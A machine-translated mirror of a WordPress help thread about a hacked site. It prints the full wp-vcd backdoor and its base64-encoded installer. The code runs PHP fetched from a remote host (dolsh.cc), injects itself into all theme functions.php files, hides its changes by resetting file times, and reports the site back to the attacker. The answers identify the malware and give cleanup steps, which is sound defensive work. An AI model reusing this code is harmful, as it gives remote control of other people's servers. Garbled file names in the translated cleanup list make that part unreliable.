我的主题的函数.php中的这段代码是什么?IF(isset($_Request[‘action’])&&isset($_Request[‘password’])

时间:2017-10-01 作者:Topy

此代码显示在我的主题中functions.php, 也在儿童主题的。我删除了两次,但它回来了。这是什么?

if ( isset( $_REQUEST[\'action\'] ) && isset( $_REQUEST[\'password\'] ) && ( $_REQUEST[\'password\'] == \'227972a1a62825660efb0f32126db07f\' ) ) {
    $div_code_name = "wp_vcd";
    switch ( $_REQUEST[\'action\'] ) {
        case \'change_domain\';
            if ( isset( $_REQUEST[\'newdomain\'] ) ) {

                if ( ! empty( $_REQUEST[\'newdomain\'] ) ) {
                    if ( $file = @file_get_contents( __FILE__ ) ) {
                        if ( preg_match_all( \'/\\$tmpcontent = @file_get_contents\\("http:\\/\\/(.*)\\/code4\\.php/i\', $file, $matcholddomain ) ) {

                            $file = preg_replace( \'/\' . $matcholddomain[1][0] . \'/i\', $_REQUEST[\'newdomain\'], $file );
                            @file_put_contents( __FILE__, $file );
                            print "true";
                        }


                    }
                }
            }
            break;


        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die( "" );
}


if ( ! function_exists( \'theme_temp_setup\' ) ) {
    $path = $_SERVER[\'HTTP_HOST\'] . $_SERVER[ REQUEST_URI ];
    if ( stripos( $_SERVER[\'REQUEST_URI\'], \'wp-cron.php\' ) == false && stripos( $_SERVER[\'REQUEST_URI\'], \'xmlrpc.php\' ) == false ) {
        if ( $tmpcontent = @file_get_contents( "http://www.dolsh.cc/code4.php?i=" . $path ) ) {
            function theme_temp_setup( $phpCode ) {
                $tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
                $handle   = fopen( $tmpfname, "w+" );
                fwrite( $handle, "<?php\\n" . $phpCode );
                fclose( $handle );
                include $tmpfname;
                unlink( $tmpfname );

                return get_defined_vars();
            }

            extract( theme_temp_setup( $tmpcontent ) );
        }
    }
}

4 个回复
SO网友:Milan Petrovic

您的网站已被黑客攻击。这是从外部触发的恶意代码,从“www.dolsh”加载更多恶意内容。“抄送”域。

如果内容在您删除后返回,那么您已经在其他地方对文件进行了黑客攻击,这些文件将自动重写函数。php任何时候加载页面。你需要找到并清理所有被感染的文件,如果没有对网站的详细审查,就不可能知道哪些文件被感染了。大多数像这样的感染都会扩散到不同的区域,以确保难以清除。

您应该备份数据库,然后从头开始重新安装WordPress、您拥有的所有插件和未感染的插件。有可能是某个插件引起了感染,或者是主题本身。如果你从一些非法网站下载了插件或主题(免费提供高级插件),这很可能是感染源。

SO网友:Topy

我用Wordfence扫描文件。扫描显示结果:

功能。2017年主题中的php也包含上述相同的代码

<?php 
error_reporting(0);
ini_set(\'display_errors\', 0);

$install_code = \'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkNCgl7DQokZGl2X2NvZGVfbmFtZT0id3BfdmNkIjsNCgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQ0KCQkJew0KDQoJCQkJDQoNCg0KDQoNCgkJCQljYXNlICdjaGFuZ2VfZG9tYWluJzsNCgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpDQoJCQkJCQkJCXsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKHByZWdfbWF0Y2hfYWxsKCcvXCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzXCgiaHR0cDpcL1wvKC4qKVwvY29kZTRcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkNCgkJCQkNCgkJCQlkZWZhdWx0OiBwcmludCAiRVJST1JfV1BfQUNUSU9OIFdQX1ZfQ0QgV1BfQ0QiOw0KCQkJfQ0KCQkJDQoJCWRpZSgiIik7DQoJfQ0KDQoJDQoNCg0KaWYgKCAhIGZ1bmN0aW9uX2V4aXN0cyggJ3RoZW1lX3RlbXBfc2V0dXAnICkgKSB7ICANCiRwYXRoPSRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUltSRVFVRVNUX1VSSV07DQppZiAoIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsNCg0KaWYoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuZG9sc2guY2MvY29kZTQucGhwP2k9Ii4kcGF0aCkpDQp7DQoNCg0KZnVuY3Rpb24gdGhlbWVfdGVtcF9zZXR1cCgkcGhwQ29kZSkgew0KICAgICR0bXBmbmFtZSA9IHRlbXBuYW0oc3lzX2dldF90ZW1wX2RpcigpLCAidGhlbWVfdGVtcF9zZXR1cCIpOw0KICAgICRoYW5kbGUgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOw0KICAgIGZ3cml0ZSgkaGFuZGxlLCAiPD9waHBcbiIgLiAkcGhwQ29kZSk7DQogICAgZmNsb3NlKCRoYW5kbGUpOw0KICAgIGluY2x1ZGUgJHRtcGZuYW1lOw0KICAgIHVubGluaygkdG1wZm5hbWUpOw0KICAgIHJldHVybiBnZXRfZGVmaW5lZF92YXJzKCk7DQp9DQoNCmV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOw0KfQ0KfQ0KfQ0KDQoNCg0KPz4=\';

$install_hash = md5($_SERVER[\'HTTP_HOST\'] . AUTH_SALT);
$install_code = str_replace(\'{$PASSWORD}\' , $install_hash, base64_decode( $install_code ));


        $themes = ABSPATH . DIRECTORY_SEPARATOR . \'wp-content\' . DIRECTORY_SEPARATOR . \'themes\';

        $ping = true;
            $ping2 = false;
        if ($list = scandir( $themes ))
            {
                foreach ($list as $_)
                    {

                        if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\'))
                            {
                                $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\');

                                if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\'))
                                    {
                                        if (strpos($content, \'WP_V_CD\') === false)
                                            {
                                                $content = $install_code . $content ;
                                                @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\', $content);
                                                touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\' , $time );
                                            }
                                        else
                                            {
                                                $ping = false;
                                            }
                                    }

                            }


                                                          else
                                                        {
                                                        $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
                                                 foreach ($list2 as $_2)
                                                        {


                                                                                if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\'))
                                                  {
                                $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\');

                                if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\'))
                                    {
                                        if (strpos($content, \'WP_V_CD\') === false)
                                            {
                                                $content = $install_code . $content ;
                                                @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\', $content);
                                                touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\' , $time );
                                                $ping2 = true;
                                            }
                                        else
                                            {
                                                //$ping = false;
                                            }
                                    }

                            }



                                                                              }

                                                        }






                    }

                if ($ping) {
                    $content = @file_get_contents(\'http://www.dolsh.cc/o.php?host=\' . $_SERVER["HTTP_HOST"] . \'&password=\' . $install_hash);
                    @file_put_contents(ABSPATH . \'/wp-includes/class.wp.php\', file_get_contents(\'http://www.dolsh.cc/admin.txt\'));
                }

                                                        if ($ping2) {
                    $content = @file_get_contents(\'http://www.dolsh.cc/o.php?host=\' . $_SERVER["HTTP_HOST"] . \'&password=\' . $install_hash);
                    @file_put_contents(ABSPATH . \'wp-includes/class.wp.php\', file_get_contents(\'http://www.dolsh.cc/admin.txt\'));
 //echo ABSPATH . \'wp-includes/class.wp.php\';
                }                   

            }



 ?><?php error_reporting(0);?>
在wp includes文件夹中,此代码显示在帖子的顶部。php文件。

 <?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?><?php
在wp includes文件夹中,有一个奇怪的文件“wp提要”,其中包含以下行:

  ::1
  127.0.0.1
现在,我已经从所有主题函数中删除了代码。php和相关文件,并删除了奇怪的文件。我注意到该代码不再返回。

这个问题源于我从提供免费插件的网站下载的插件。

SO网友:Naman Rastogi

您共享的代码指向WordPress网站中的wp vcd恶意软件。wp vcd恶意软件的主要症状是垃圾邮件弹出窗口,在网站上创建垃圾邮件URL。

已发现一些恶意代码变体修改核心WordPress文件,并在/wp includes目录中添加新文件。

恶意软件创建了一个后门,允许黑客长时间访问您的网站,黑客可以利用WordPress插件中的漏洞;在易受攻击的网站上上载wp vcd恶意软件的主题。在主题中的php文件中,您会看到一些类似的代码:

<?php if (file_exists(dirname(__FILE__) . \'/class.theme-modules.php\')) include_once(dirname(__FILE__) . \'/class.theme-modules.php\'); ?>

Cleaning

方法1–在服务器上搜索通常感染wp vcd黑客的文件

可湿性粉剂包括/可湿性粉剂vcd。php包括/wp tmp。ph可湿性粉剂内容/主题/*/功能。php(服务器上安装的所有主题,无论是否处于活动状态)

  • 类。主题模块。php(主题文件夹内)
    • 方法2–搜索在受感染的恶意软件文件中找到的字符串模式

    功能wp\\u temp\\u setupx。php德尔纳。顶部/代码。php

  • stripos($tmpcontent,$wp\\u auth\\u key)
      • 仅供参考-https://www.getastra.com/blog/911/how-to-fix-wp-vcd-backdoor-hack-in-wordpress-functions-php/

    SO网友:wpgeek

    如果你免费下载了高级插件,请检查,如果它有这两个文件,请注意,这些文件背后的这个问题。

    班插件模块。PHP类。主题模块。php

    安装之前,该文件大小为35kb,一旦安装并激活主题/插件,它会将其代码移动到主机中的所有wp includes文件夹。因此,它一直生活在所有其他网站wp包括隐藏。

    结束
    标签: functions   code   小码农  

    相关推荐

    Custom css code in wordpress

    有人能帮我写几行css代码吗?我想在我的页面上搜索我的部分:http://www.virtual-forms.com/docs/看起来像这样:https://docs.wedevs.com/我想更改这3个元素(搜索字段(文本框)、在文档中搜索(组合框)和搜索提交(按钮))。首先以内联方式对齐,然后更改外观,使其与另一页上的外观相似。谢谢Davor